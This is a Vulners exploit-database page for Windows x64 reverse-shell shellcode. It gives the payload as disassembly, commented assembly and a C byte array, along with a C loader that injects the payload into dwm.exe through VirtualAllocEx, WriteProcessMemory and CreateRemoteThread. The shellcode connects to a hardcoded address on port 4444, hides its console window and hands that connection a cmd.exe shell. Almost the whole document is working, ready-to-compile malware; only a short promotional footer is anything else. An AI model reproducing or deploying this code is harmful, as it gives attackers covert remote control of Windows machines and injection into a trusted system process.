Vulners
Lucene search
Windows x64 - Reverse Shell TCP Shellcode (694 bytes)
/*
# Title : Windows x64 Reverse Shell TCP shellcode
# size : 694 bytes
# Author: Roziul Hasan Khan Shifat
# Date : 10-11-2016
# Tested on : Windows 7 x64 Professional
# Email : [email protected]
*/
/*
Disassembly of section .text:
0000000000000000 <s>:
0: 48 31 d2 xor %rdx,%rdx
3: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
8: 48 8b 70 18 mov 0x18(%rax),%rsi
c: 48 8b 76 10 mov 0x10(%rsi),%rsi
10: 48 ad lods %ds:(%rsi),%rax
12: 48 8b 30 mov (%rax),%rsi
15: 48 8b 7e 30 mov 0x30(%rsi),%rdi
19: b2 88 mov $0x88,%dl
1b: 8b 5f 3c mov 0x3c(%rdi),%ebx
1e: 48 01 fb add %rdi,%rbx
21: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
24: 48 01 fb add %rdi,%rbx
27: 44 8b 73 1c mov 0x1c(%rbx),%r14d
2b: 49 01 fe add %rdi,%r14
2e: 66 ba fc 0c mov $0xcfc,%dx
32: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx
36: 48 01 fb add %rdi,%rbx
39: 48 31 d2 xor %rdx,%rdx
3c: 52 push %rdx
3d: 52 push %rdx
3e: c7 04 24 77 73 32 5f movl $0x5f327377,(%rsp)
45: c7 44 24 04 33 32 2e movl $0x642e3233,0x4(%rsp)
4c: 64
4d: 66 c7 44 24 08 6c 6c movw $0x6c6c,0x8(%rsp)
54: 48 8d 0c 24 lea (%rsp),%rcx
58: 48 83 ec 58 sub $0x58,%rsp
5c: ff d3 callq *%rbx
5e: 48 83 c4 68 add $0x68,%rsp
62: 48 89 c6 mov %rax,%rsi
65: 48 31 db xor %rbx,%rbx
68: 48 31 d2 xor %rdx,%rdx
6b: b2 88 mov $0x88,%dl
6d: 8b 5e 3c mov 0x3c(%rsi),%ebx
70: 48 01 f3 add %rsi,%rbx
73: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
76: 48 01 f3 add %rsi,%rbx
79: 44 8b 7b 1c mov 0x1c(%rbx),%r15d
7d: 49 01 f7 add %rsi,%r15
80: 48 31 d2 xor %rdx,%rdx
83: 66 ba c8 01 mov $0x1c8,%dx
87: 41 8b 1c 17 mov (%r15,%rdx,1),%ebx
8b: 48 01 f3 add %rsi,%rbx
8e: 66 ba 98 01 mov $0x198,%dx
92: 48 29 d4 sub %rdx,%rsp
95: 48 8d 14 24 lea (%rsp),%rdx
99: 48 31 c9 xor %rcx,%rcx
9c: 66 b9 02 02 mov $0x202,%cx
a0: 48 83 ec 58 sub $0x58,%rsp
a4: ff d3 callq *%rbx
a6: 48 31 d2 xor %rdx,%rdx
a9: 48 83 ec 58 sub $0x58,%rsp
ad: 48 89 54 24 20 mov %rdx,0x20(%rsp)
b2: 48 89 54 24 28 mov %rdx,0x28(%rsp)
b7: 48 ff c2 inc %rdx
ba: 48 89 d1 mov %rdx,%rcx
bd: 48 ff c1 inc %rcx
c0: 4d 31 c0 xor %r8,%r8
c3: 49 83 c0 06 add $0x6,%r8
c7: 4d 31 c9 xor %r9,%r9
ca: 66 41 b9 88 01 mov $0x188,%r9w
cf: 43 8b 1c 0f mov (%r15,%r9,1),%ebx
d3: 48 01 f3 add %rsi,%rbx
d6: 4d 31 c9 xor %r9,%r9
d9: ff d3 callq *%rbx
db: 49 89 c5 mov %rax,%r13
de: 4d 31 c0 xor %r8,%r8
e1: 41 50 push %r8
e3: 41 50 push %r8
e5: c6 04 24 02 movb $0x2,(%rsp)
e9: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%rsp)
f0: c7 44 24 04 c0 a8 0a movl $0x800aa8c0,0x4(%rsp)
f7: 80
f8: 4c 8d 24 24 lea (%rsp),%r12
fc: 48 83 ec 58 sub $0x58,%rsp
0000000000000100 <c>:
100: 48 31 db xor %rbx,%rbx
103: 41 8b 5f 0c mov 0xc(%r15),%ebx
107: 48 01 f3 add %rsi,%rbx
10a: 4c 89 e2 mov %r12,%rdx
10d: 4c 89 e9 mov %r13,%rcx
110: 41 b0 10 mov $0x10,%r8b
113: ff d3 callq *%rbx
115: 4d 31 c0 xor %r8,%r8
118: 4c 39 c0 cmp %r8,%rax
11b: 75 e3 jne 100 <c>
11d: 48 31 db xor %rbx,%rbx
120: 41 8b 5e 40 mov 0x40(%r14),%ebx
124: 48 01 fb add %rdi,%rbx
127: ff d3 callq *%rbx
129: 48 31 d2 xor %rdx,%rdx
12c: 52 push %rdx
12d: 52 push %rdx
12e: c7 04 24 75 73 65 72 movl $0x72657375,(%rsp)
135: c7 44 24 04 33 32 2e movl $0x642e3233,0x4(%rsp)
13c: 64
13d: 66 c7 44 24 08 6c 6c movw $0x6c6c,0x8(%rsp)
144: 48 8d 0c 24 lea (%rsp),%rcx
148: 66 ba fc 0c mov $0xcfc,%dx
14c: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx
150: 48 01 fb add %rdi,%rbx
153: 48 83 ec 58 sub $0x58,%rsp
157: ff d3 callq *%rbx
159: 48 89 c6 mov %rax,%rsi
15c: 48 31 db xor %rbx,%rbx
15f: 48 31 d2 xor %rdx,%rdx
162: 66 ba 4a 02 mov $0x24a,%dx
166: 45 8b 24 96 mov (%r14,%rdx,4),%r12d
16a: 49 01 fc add %rdi,%r12
16d: 48 31 c9 xor %rcx,%rcx
170: 51 push %rcx
171: 51 push %rcx
172: c7 04 24 46 69 6e 64 movl $0x646e6946,(%rsp)
179: c7 44 24 04 57 69 6e movl $0x646e6957,0x4(%rsp)
180: 64
181: c7 44 24 08 6f 77 41 movl $0x4141776f,0x8(%rsp)
188: 41
189: 80 74 24 0b 41 xorb $0x41,0xb(%rsp)
18e: 48 8d 14 24 lea (%rsp),%rdx
192: 48 89 f1 mov %rsi,%rcx
195: 48 83 ec 58 sub $0x58,%rsp
199: 41 ff d4 callq *%r12
19c: 48 31 d2 xor %rdx,%rdx
19f: 52 push %rdx
1a0: 52 push %rdx
1a1: 52 push %rdx
1a2: c7 04 24 43 6f 6e 73 movl $0x736e6f43,(%rsp)
1a9: c7 44 24 04 6f 6c 65 movl $0x57656c6f,0x4(%rsp)
1b0: 57
1b1: c7 44 24 08 69 6e 64 movl $0x6f646e69,0x8(%rsp)
1b8: 6f
1b9: c7 44 24 0c 77 43 6c movl $0x616c4377,0xc(%rsp)
1c0: 61
1c1: 66 c7 44 24 10 73 73 movw $0x7373,0x10(%rsp)
1c8: 48 8d 0c 24 lea (%rsp),%rcx
1cc: 48 83 ec 58 sub $0x58,%rsp
1d0: ff d0 callq *%rax
1d2: 49 89 c7 mov %rax,%r15
1d5: 48 31 d2 xor %rdx,%rdx
1d8: 48 31 c9 xor %rcx,%rcx
1db: 51 push %rcx
1dc: 51 push %rcx
1dd: c7 04 24 53 68 6f 77 movl $0x776f6853,(%rsp)
1e4: c7 44 24 04 57 69 6e movl $0x646e6957,0x4(%rsp)
1eb: 64
1ec: 66 c7 44 24 08 6f 77 movw $0x776f,0x8(%rsp)
1f3: 48 8d 14 24 lea (%rsp),%rdx
1f7: 48 89 f1 mov %rsi,%rcx
1fa: 48 83 ec 58 sub $0x58,%rsp
1fe: 41 ff d4 callq *%r12
201: 4c 89 f9 mov %r15,%rcx
204: 48 31 d2 xor %rdx,%rdx
207: 48 83 ec 58 sub $0x58,%rsp
20b: ff d0 callq *%rax
20d: 66 ba 90 02 mov $0x290,%dx
211: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx
215: 48 01 fb add %rdi,%rbx
218: 48 83 ec 68 sub $0x68,%rsp
21c: 48 83 ec 18 sub $0x18,%rsp
220: 4c 8d 24 24 lea (%rsp),%r12
224: b2 68 mov $0x68,%dl
226: 48 31 c9 xor %rcx,%rcx
229: 41 89 14 24 mov %edx,(%r12)
22d: 49 89 4c 24 04 mov %rcx,0x4(%r12)
232: 49 89 4c 24 0c mov %rcx,0xc(%r12)
237: 49 89 4c 24 14 mov %rcx,0x14(%r12)
23c: 49 89 4c 24 18 mov %rcx,0x18(%r12)
241: 48 31 d2 xor %rdx,%rdx
244: b2 ff mov $0xff,%dl
246: 48 ff c2 inc %rdx
249: 41 89 54 24 3c mov %edx,0x3c(%r12)
24e: 4d 89 6c 24 50 mov %r13,0x50(%r12)
253: 4d 89 6c 24 58 mov %r13,0x58(%r12)
258: 4d 89 6c 24 60 mov %r13,0x60(%r12)
25d: 68 63 6d 64 41 pushq $0x41646d63
262: 88 54 24 03 mov %dl,0x3(%rsp)
266: 48 8d 14 24 lea (%rsp),%rdx
26a: 48 ff c1 inc %rcx
26d: 48 83 ec 58 sub $0x58,%rsp
271: 48 89 4c 24 20 mov %rcx,0x20(%rsp)
276: 48 31 c9 xor %rcx,%rcx
279: 4d 31 c0 xor %r8,%r8
27c: 4c 89 44 24 28 mov %r8,0x28(%rsp)
281: 4c 89 44 24 30 mov %r8,0x30(%rsp)
286: 4c 89 44 24 38 mov %r8,0x38(%rsp)
28b: 4d 8d 0c 24 lea (%r12),%r9
28f: 4c 89 4c 24 40 mov %r9,0x40(%rsp)
294: 4d 8d 4c 24 68 lea 0x68(%r12),%r9
299: 4c 89 4c 24 48 mov %r9,0x48(%rsp)
29e: 4d 31 c9 xor %r9,%r9
2a1: ff d3 callq *%rbx
2a3: 48 31 d2 xor %rdx,%rdx
2a6: 66 ba a0 04 mov $0x4a0,%dx
2aa: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx
2ae: 48 01 fb add %rdi,%rbx
2b1: 48 31 c9 xor %rcx,%rcx
2b4: ff d3 callq *%rbx
*/
/*
section .text
global s
s:
xor rdx,rdx
mov rax,[gs:rdx+0x60]
mov rsi,[rax+0x18]
mov rsi,[rsi+0x10]
lodsq
mov rsi,[rax]
mov rdi,[rsi+0x30]
;--------------------------------
mov dl,0x88
mov ebx,[rdi+0x3c]
add rbx,rdi
mov ebx,[rbx+rdx]
add rbx,rdi ;IMAGE_EXPORT_DIRECTORY
mov r14d,[rbx+0x1c]
add r14,rdi ;kernel32.dll AddressOfFunctions
;-----------------------
;loading ws2_32.dll
mov dx,831*4
mov ebx,[r14+rdx]
add rbx,rdi ;LoadLibraryA()
xor rdx,rdx
push rdx
push rdx
mov [rsp],dword 'ws2_'
mov [rsp+4],dword '32.d'
mov [rsp+8],word 'll'
lea rcx,[rsp]
sub rsp,88
call rbx
add rsp,104
mov rsi,rax ;ws2_32.dll base address
;--------------------------------------
xor rbx,rbx
xor rdx,rdx
;finding Export table of ws2_32.dll
mov dl,0x88
mov ebx,[rsi+0x3c]
add rbx,rsi
mov ebx,[rbx+rdx]
add rbx,rsi ;IMAGE_EXPORT_DIRECTORY
mov r15d,[rbx+0x1c]
add r15,rsi ;ws2_32.dll AddressOfFunctions
;--------------------------------------
;WSAStartup(514,&WSADATA)
xor rdx,rdx
mov dx,114*4
mov ebx,[r15+rdx]
add rbx,rsi ;rbx=WSAStartup()
mov dx,408
sub rsp,rdx
lea rdx,[rsp]
xor rcx,rcx
mov cx,514
sub rsp,88 ;reserving space for API call (Important)
call rbx
;-------------------------------------------------------
;WSASocketA(2,1,6,0,0,0)
xor rdx,rdx
sub rsp,88
mov [rsp+32],rdx
mov [rsp+40],rdx
inc rdx
mov rcx,rdx
inc rcx
xor r8,r8
add r8,6
xor r9,r9
mov r9w,98*4
mov ebx,[r15+r9]
add rbx,rsi ;rbx=WSASocketA()
xor r9,r9
call rbx
mov r13,rax ;r13=SOCKET
;------------------------------------------
xor r8,r8
push r8
push r8
mov [rsp],byte 2
mov [rsp+2],word 0x5c11 ;port 4444
mov [rsp+4],dword 0x800aa8c0 ;change it
lea r12,[rsp]
sub rsp,88
;-------------------------------------------
;connect(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
c:
xor rbx,rbx
mov ebx,[r15+12]
add rbx,rsi ;rbx=connect()
mov rdx,r12
mov rcx,r13
mov r8b,16
call rbx
xor r8,r8
cmp rax,r8
jnz c
;----------------------------------------------------------------------------------------
;Hiding Window
;----------------------------------------------------------------------------------------
;AllocConsole()
xor rbx,rbx
mov ebx,[r14+64]
add rbx,rdi ;rbx=AllocConsole()
call rbx
;------------------------------
;loading user32.dll
xor rdx,rdx
push rdx
push rdx
mov [rsp],dword 'user'
mov [rsp+4],dword '32.d'
mov [rsp+8],word 'll'
lea rcx,[rsp]
mov dx,831*4
mov ebx,[r14+rdx]
add rbx,rdi
sub rsp,88
call rbx
mov rsi,rax
;--------------------------------
xor rbx,rbx
xor rdx,rdx
;----------------------------------
;FindWindowA("ConsoleWindowClass",NULL)
mov dx,586
mov r12d,[r14+rdx*4]
add r12,rdi ;rbx=GetProcAddress()
xor rcx,rcx
push rcx
push rcx
mov [rsp],dword 'Find'
mov [rsp+4],dword 'Wind'
mov [rsp+8],dword 'owAA'
xor byte [rsp+11],0x41
lea rdx,[rsp]
mov rcx,rsi
sub rsp,88
call r12
;-----------------------------------
xor rdx,rdx
push rdx
push rdx
push rdx
mov [rsp],dword 'Cons'
mov [rsp+4],dword 'oleW'
mov [rsp+8],dword 'indo'
mov [rsp+12],dword 'wCla'
mov [rsp+16],word 'ss'
lea rcx,[rsp]
sub rsp,88
call rax
mov r15,rax
xor rdx,rdx
;---------------------------------------
;ShowWindow(HWND,0)
xor rcx,rcx
push rcx
push rcx
mov [rsp],dword 'Show'
mov [rsp+4],dword 'Wind'
mov [rsp+8],word 'ow'
lea rdx,[rsp]
mov rcx,rsi
sub rsp,88
call r12
mov rcx,r15
xor rdx,rdx
sub rsp,88
call rax
;-----------------------------------------------
;--------------------------------------------------------------------------------------------------------------------------------
;CreateProcessA()
mov dx,164*4
mov ebx,[r14+rdx]
add rbx,rdi
;STARTUPINFOA+PROCESS_INFORMATION
;----------------------------------
sub rsp,104
sub rsp,24
lea r12,[rsp]
mov dl,104
xor rcx,rcx
mov [r12],dword edx
mov [r12+4],rcx
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx
xor rdx,rdx
mov dl,255
inc rdx
mov [r12+0x3c],edx
mov [r12+0x50],r13
mov [r12+0x58],r13
mov [r12+0x60],r13
;--------------------------------------------------
push 'cmdA'
mov [rsp+3],byte dl
lea rdx,[rsp]
inc rcx
;-------------------------------------
sub rsp,88
mov [rsp+32],rcx
xor rcx,rcx
xor r8,r8
mov [rsp+40],r8
mov [rsp+48],r8
mov [rsp+56],r8
lea r9,[r12]
mov [rsp+64],r9
lea r9,[r12+104]
mov [rsp+72],r9
xor r9,r9
call rbx
;-------------------------------
xor rdx,rdx
mov dx,296*4
mov ebx,[r14+rdx]
add rbx,rdi
xor rcx,rcx
call rbx
*/
#include<stdio.h>
#include<windows.h>
#include<TlHelp32.h>
#include<string.h>
char shellcode[]="\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\xb2\x88\x8b\x5f\x3c\x48\x01\xfb\x8b\x1c\x13\x48\x01\xfb\x44\x8b\x73\x1c\x49\x01\xfe\x66\xba\xfc\x0c\x41\x8b\x1c\x16\x48\x01\xfb\x48\x31\xd2\x52\x52\xc7\x04\x24\x77\x73\x32\x5f\xc7\x44\x24\x04\x33\x32\x2e\x64\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x48\x83\xc4\x68\x48\x89\xc6\x48\x31\xdb\x48\x31\xd2\xb2\x88\x8b\x5e\x3c\x48\x01\xf3\x8b\x1c\x13\x48\x01\xf3\x44\x8b\x7b\x1c\x49\x01\xf7\x48\x31\xd2\x66\xba\xc8\x01\x41\x8b\x1c\x17\x48\x01\xf3\x66\xba\x98\x01\x48\x29\xd4\x48\x8d\x14\x24\x48\x31\xc9\x66\xb9\x02\x02\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x48\x83\xec\x58\x48\x89\x54\x24\x20\x48\x89\x54\x24\x28\x48\xff\xc2\x48\x89\xd1\x48\xff\xc1\x4d\x31\xc0\x49\x83\xc0\x06\x4d\x31\xc9\x66\x41\xb9\x88\x01\x43\x8b\x1c\x0f\x48\x01\xf3\x4d\x31\xc9\xff\xd3\x49\x89\xc5\x4d\x31\xc0\x41\x50\x41\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x0a\x80\x4c\x8d\x24\x24\x48\x83\xec\x58\x48\x31\xdb\x41\x8b\x5f\x0c\x48\x01\xf3\x4c\x89\xe2\x4c\x89\xe9\x41\xb0\x10\xff\xd3\x4d\x31\xc0\x4c\x39\xc0\x75\xe3\x48\x31\xdb\x41\x8b\x5e\x40\x48\x01\xfb\xff\xd3\x48\x31\xd2\x52\x52\xc7\x04\x24\x75\x73\x65\x72\xc7\x44\x24\x04\x33\x32\x2e\x64\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x66\xba\xfc\x0c\x41\x8b\x1c\x16\x48\x01\xfb\x48\x83\xec\x58\xff\xd3\x48\x89\xc6\x48\x31\xdb\x48\x31\xd2\x66\xba\x4a\x02\x45\x8b\x24\x96\x49\x01\xfc\x48\x31\xc9\x51\x51\xc7\x04\x24\x46\x69\x6e\x64\xc7\x44\x24\x04\x57\x69\x6e\x64\xc7\x44\x24\x08\x6f\x77\x41\x41\x80\x74\x24\x0b\x41\x48\x8d\x14\x24\x48\x89\xf1\x48\x83\xec\x58\x41\xff\xd4\x48\x31\xd2\x52\x52\x52\xc7\x04\x24\x43\x6f\x6e\x73\xc7\x44\x24\x04\x6f\x6c\x65\x57\xc7\x44\x24\x08\x69\x6e\x64\x6f\xc7\x44\x24\x0c\x77\x43\x6c\x61\x66\xc7\x44\x24\x10\x73\x73\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd0\x49\x89\xc7\x48\x31\xd2\x48\x31\xc9\x51\x51\xc7\x04\x24\x53\x68\x6f\x77\xc7\x44\x24\x04\x57\x69\x6e\x64\x66\xc7\x44\x24\x08\x6f\x77\x48\x8d\x14\x24\x48\x89\xf1\x48\x83\xec\x58\x41\xff\xd4\x4c\x89\xf9\x48\x31\xd2\x48\x83\xec\x58\xff\xd0\x66\xba\x90\x02\x41\x8b\x1c\x16\x48\x01\xfb\x48\x83\xec\x68\x48\x83\xec\x18\x4c\x8d\x24\x24\xb2\x68\x48\x31\xc9\x41\x89\x14\x24\x49\x89\x4c\x24\x04\x49\x89\x4c\x24\x0c\x49\x89\x4c\x24\x14\x49\x89\x4c\x24\x18\x48\x31\xd2\xb2\xff\x48\xff\xc2\x41\x89\x54\x24\x3c\x4d\x89\x6c\x24\x50\x4d\x89\x6c\x24\x58\x4d\x89\x6c\x24\x60\x68\x63\x6d\x64\x41\x88\x54\x24\x03\x48\x8d\x14\x24\x48\xff\xc1\x48\x83\xec\x58\x48\x89\x4c\x24\x20\x48\x31\xc9\x4d\x31\xc0\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\x4c\x89\x44\x24\x38\x4d\x8d\x0c\x24\x4c\x89\x4c\x24\x40\x4d\x8d\x4c\x24\x68\x4c\x89\x4c\x24\x48\x4d\x31\xc9\xff\xd3\x48\x31\xd2\x66\xba\xa0\x04\x41\x8b\x1c\x16\x48\x01\xfb\x48\x31\xc9\xff\xd3";
void inject(DWORD );
int main()
{
char program_name[]="dwm.exe"; //Process name to inject. change it if U Want
BOOL f=0;
HANDLE snap;
PROCESSENTRY32 pe32;
snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(snap==INVALID_HANDLE_VALUE)
{
printf("CreateToolhelp32Snapshot() Failed."); return 0;
}
pe32.dwSize=sizeof(pe32);
if(!Process32First(snap,&pe32))
{
printf("Process32First() Failed."); return 0;
}
do
{
if(0==strncmp(program_name,pe32.szExeFile,strlen(program_name)))
{
f=TRUE;
break;
}
}while(Process32Next(snap,&pe32));
if(!f)
{
printf("No infomation found about \"%s\" ",program_name);
}
else
{
printf("Program name:%s\nProcess id: %d",pe32.szExeFile,pe32.th32ProcessID);
printf("\nInjecting shellcode");
inject(pe32.th32ProcessID);
}
return 0;
}
void inject(DWORD pid)
{
HANDLE phd,h;
LPVOID shell;
phd=OpenProcess(PROCESS_ALL_ACCESS,0,pid);
if(phd==INVALID_HANDLE_VALUE)
{
printf("\nOpenProcess() Failed."); return ;
}
shell=VirtualAllocEx(phd,0,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
if(shell==NULL)
{
printf("\nVirtualAllocEx() Failed"); CloseHandle(phd); return ;
}
WriteProcessMemory(phd,shell,shellcode,sizeof(shellcode),0);
printf("\nInjection successfull\n");
printf("Running Shellcode......\n");
h=CreateRemoteThread(phd,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0);
if(h==NULL)
{
printf("Failed to Run Shellcode\n"); return ;
}
else
printf("shellcode Execution Successfull");
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Nov 2016 00:00Current
0.2Low risk
Vulners AI Score0.2